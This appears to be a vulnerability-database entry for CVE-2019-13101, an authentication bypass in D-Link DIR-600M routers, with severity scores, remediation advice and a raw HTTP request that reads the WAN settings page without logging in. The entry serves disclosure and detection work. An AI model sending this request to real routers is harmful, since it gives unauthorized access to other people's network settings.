| Title | D-Link DIR-600M - Authentication Bypass |
|---|---|
| Author | Suman_Kar |
| Severity | Critical |
| Impact | An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network. |
| Remediation | Update the router's firmware to the latest version provided by D-Link. |
| CVSS Score | 9.8 |
| EPSS Score | 0.85471 |
| CVE ID | CVE-2019-13101 |
| CWE ID | CWE-306 |
| Tags | cve2019 cve packetstorm edb dlink router iot vkev vuln |
D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
GET /wan.htm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0
Connection: close
Origin: http://www.victim.com
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-13101.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-13101.pcap
N/AN/A